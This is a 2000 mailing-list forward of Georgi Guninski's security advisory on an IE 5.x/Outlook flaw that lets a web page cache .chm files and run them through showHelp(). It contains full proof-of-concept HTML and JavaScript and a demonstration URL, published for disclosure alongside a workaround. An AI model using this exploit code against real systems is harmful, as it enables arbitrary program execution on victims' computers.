[Esa-l] IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder (fwd)

John D. Hardin jhardin at wolfenet.com
Thu Nov 23 11:02:32 PST 2000


Poisoning *.chm will not prevent this attack, but the HTML defanger
will.

--
 John Hardin KA7OHZ   ICQ#15735746   http://www.wolfenet.com/~jhardin/
 jhardin at wolfenet.com      pgpk -a finger://gonzo.wolfenet.com/jhardin
  768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76 
 1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
  "Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
  does quite what I want. I wish Christopher Robin was here."
				-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
   Today: Thanksgiving

---------- Forwarded message ----------
Date: Mon, 20 Nov 2000 18:50:46 +0200
From: Georgi Guninski <guninski at GUNINSKI.COM>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: IE 5.x/Outlook allows executing arbitrary programs using .chm         
        files and temporary internet files folder

Georgi Guninski security advisory #28, 2000

IE 5.x/Outlook allows executing arbitrary programs using .chm files and
temporary internet files folder

Systems affected:
IE 5.5/Outlook/Outlook Express - probably other versions, have not
tested

Risk: High
Date: 20 October 2000

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified.
You may not modify it and distribute it or distribute parts of it
without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this
advisory or program or
any derivatives thereof.

Description:

There is a security vulnerability in IE 5.5/Outlook/Outlook Express
which allows
executing arbitratrary programs using .chm files and revealing the
location of
temporary internet files folder. This may lead to taking full control
over user's computer.

Details:
I reported a similar vulnerability regarding .chm files sometime ago and
Microsoft fixed it
by allowing .chm files to run programs only if the .chm was loaded from
the local file system.
But it is possible to find the temporary internet files folder - there
are several folders with
random names.
The following HTML code:
<DEFANGED_OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html"
WIDTH=200 HEIGHT=200>
where SOMEHOST.COM is a web server or alias that is different from the
web server from which
the HTML page is loaded may reveal one of the temporary internet files
folders thru document.URL.
Once a temporary internet files folder name is known it is possible to
cache a .chm in any
temporary internet files folder and then use window.showHelp() to
execute it.
There are other ways to execute programs once a temporary internet files
folder is known and
document is cached in it but showHelp() seems to be the simplest.
If the demonstration does not work wait a minute and reload the page or
increase the number of
"chm*.chm" files in <IMG> and showHelp() or increase the time to wait if
it is insufficient
to download the chm files.


The code is:

---------chmtempmain.html------------------------------------------
<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1>
<BR>
The object below must be loaded from a server with name different from
the parent document -
it may be the same server but use the IP address or another alias.
<BR>
If this does not work try increasing the number of "chm*.chm" in IMG and
showHelp.
<BR>
<DEFANGED_OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html"
WIDTH=200 HEIGHT=200>
---------------------------------------------------------------------

--------chtmtemp.html------------------------------------------------
<DEFANGED_SCRIPT>
function g()
{
s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
alert("One of your temp files directory is: "+path);
window.showHelp(path+"\\chm1[1].chm");
window.showHelp(path+"\\chm2[1].chm");
window.showHelp(path+"\\chm3[1].chm");
window.showHelp(path+"\\chm4[1].chm");
window.showHelp(path+"\\chm5[1].chm");
window.showHelp(path+"\\chm6[1].chm");
window.showHelp(path+"\\chm7[1].chm");
window.showHelp(path+"\\chm8[1].chm");
window.showHelp(path+"\\chm9[1].chm");
window.showHelp(path+"\\chm10[1].chm");

}
setTimeout("g()",5000); // if you are on a slow internet connection you
must increase the delay
</SCRIPT>
---------------------------------------------------------------------



Workaround:
Disable Active Scripting


Demonstration is available at:
http://www.guninski.com/chmtempmain.html

Vendor status:
Microsoft was contacted on 15 November 2000.


Regards,
Georgi Guninski
http://www.guninski.com




More information about the esd-l mailing list